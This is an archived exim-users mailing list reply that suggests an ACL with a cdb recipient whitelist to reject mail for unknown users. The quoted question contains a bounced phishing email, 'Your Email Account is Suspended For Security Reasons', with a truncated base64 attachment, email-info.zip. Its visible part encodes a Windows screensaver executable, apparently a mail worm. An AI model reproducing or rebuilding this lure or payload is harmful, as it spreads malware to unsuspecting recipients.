Re: [exim] spoof...

Top Page
Delete this message
Reply to this message
Author: Martin Hepworth
Date:  
To: Ryan Kerwin Macrohon
CC: exim-users
Subject: Re: [exim] spoof...
Ryan

easiest way is to create a list that can be looked up so you exim will
only allow valid users to recieve email.

I use a cdb lookup, but an lsearch lookup will work just fine for a list
with a couple of hundred accounts..

my ACL (in acl_check_rcpt:) looks like this..

   accept  domains       = +check_rcpt_domains
           endpass
           message       = user unknown
           recipients    = cdb;/usr/local/etc/exim/whitelist.cdb


--
Martin Hepworth
Snr Systems Administrator
Solid State Logic
Tel: +44 (0)1865 842300


Ryan Kerwin Macrohon wrote:
> Ive been receiving emails that sends mails to different users that are not users on my domain...how do i prevent this?
>
>
>
> In this example,fred is not an account in my domain..
>
>
> Thanks guys!!!!
>
>
>
> This message was created automatically by mail delivery software.
>
> A message that you sent could not be delivered to one or more of its
> recipients. This is a permanent error. The following address(es) failed:
>
>   fred@???
>     Unrouteable address

>
> ------ This is a copy of the message, including all the headers. ------
>
> Return-path: <mail@???>
> Received: from amavis by server1.hitachi-himap.com.ph with scanned-ok (Exim 4.14 #1 (OpenNA Linux))
> id 1DbeJZ-0004Sh-WF
> for <fred@???>; Fri, 27 May 2005 17:51:49 +0500
> Received: from [222.126.0.180] (helo=hitachi-himap.com.ph)
> by server1.hitachi-himap.com.ph with esmtp (Exim 4.14 #1 (OpenNA Linux))
> id 1DbeJY-0008Nx-FA
> for <fred@???>; Fri, 27 May 2005 17:51:48 +0500
> From: mail@???
> To: fred@???
> Subject: Your Email Account is Suspended For Security Reasons
> Date: Fri, 27 May 2005 10:53:44 +0900
> MIME-Version: 1.0
> Content-Type: multipart/mixed;
> boundary="----=_NextPart_000_0007_614E5ABB.4814C5F9"
> X-Priority: 3
> X-MSMail-Priority: Normal
> Message-Id: <E1DbeJY-0008Nx-FA@???>
> X-Virus-Scanned: by AMaViS perl-11
>
> This is a multi-part message in MIME format.
>
> ------=_NextPart_000_0007_614E5ABB.4814C5F9
> Content-Type: text/plain;
> charset="Windows-1252"
> Content-Transfer-Encoding: 7bit
>
> Account Information Are Attached!
>
>
> ------=_NextPart_000_0007_614E5ABB.4814C5F9
> Content-Type: application/octet-stream;
> name="email-info.zip"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment;
> filename="email-info.zip"
>
> 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


**********************************************************************

This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.

This footnote confirms that this email message has been swept
for the presence of computer viruses and is believed to be clean.    


**********************************************************************